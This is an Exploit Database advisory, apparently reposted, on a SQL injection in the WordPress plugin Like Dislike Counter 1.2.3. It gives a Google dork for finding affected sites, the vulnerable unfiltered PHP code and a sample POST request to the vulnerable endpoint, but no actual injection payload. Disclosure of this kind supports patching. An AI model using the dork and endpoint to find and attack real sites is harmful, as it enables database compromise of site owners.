WordPress Plugin Like Dislike Counter 1.2.3 – SQL Injection

• Exploit Database
• 32 阅读

• 作者： Att4ck3r.ir
  日期： 2014-09-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34553/

• #################################################################################################
  #
  # Title: WordPress Like Dislike Counter Plugin SQL 
  Injection Vulnerability
  # Risk : High+/Critical
  # Exploit Author : XroGuE
  # Google Dork: 
  inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php 
  ANDplugins/pro-like-dislike-counter/ldc-ajax-counter.php
  # Plugin Version : 1.2.3
  # Plugin Name: Like Dislike Counter
  # Plugin Download Link : 
  http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
  # Vendor Home: www.wpfruits.com
  # Date : 2014/09/05
  # Tested in: Win7 - Linux
  #
  ##################################################################################################
  # This Vulnerability Available in Both Version of This Plugin (Free & 
  Pro Version).
  #
  # PoC :
  #
  # 
  http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
  #
  # Vulnerable Page : ajax_counter.php
  #
  #	if (!$changedDir)$changedDir = 
  preg_replace('|wp-content.*$|','',__FILE__);
  #	include_once($changedDir.'/wp-config.php');
  #	if(isset($_COOKIE['ul_post_cnt']))
  #	{
  #	$posts_present=$_COOKIE['ul_post_cnt'];
  #	}
  #	else
  #	{
  #	$posts_present=array();
  #	}
  # // Here ------------------------> Inputs Not Filtered ! :|
  #	$post_id=$_POST['post_id'];
  #	$up_type=$_POST['up_type'];
  # // Here <------------------------
  #	if($up_type=='c_like'||$up_type=='c_dislike')
  #	{
  #	$for_com='c_';
  #	}
  #	else
  #	{
  #	$for_com='';
  #	}
  #	if(!in_array($for_com.$post_id,$posts_present))
  #	{
  #	update_post_ul_meta($post_id,$up_type);
  #	}
  #	echo get_post_ul_meta($post_id,$up_type);
  #
  ##################################################################################################
  # POST 
  wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php 
  HTTP/1.1
  # Host: localhost
  # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) 
  Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21
  # Accept: */*
  # Accept-Language: en-US,en;q=0.5
  # Accept-Encoding: gzip, deflate
  # Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  # X-Requested-With: XMLHttpRequest
  # Referer: http://localhost/wp/
  # Content-Length: 24
  # Connection: keep-alive
  # Pragma: no-cache
  # Cache-Control: no-cache
  # post_id=1&up_type=like
  ##################################################################################################
  #
  # Founded By : XroGuE
  # Website: http://www.Att4ck3r.ir
  # E-Mail : info[at]att4ck3r[Dot]ir
  #
  ##################################################################################################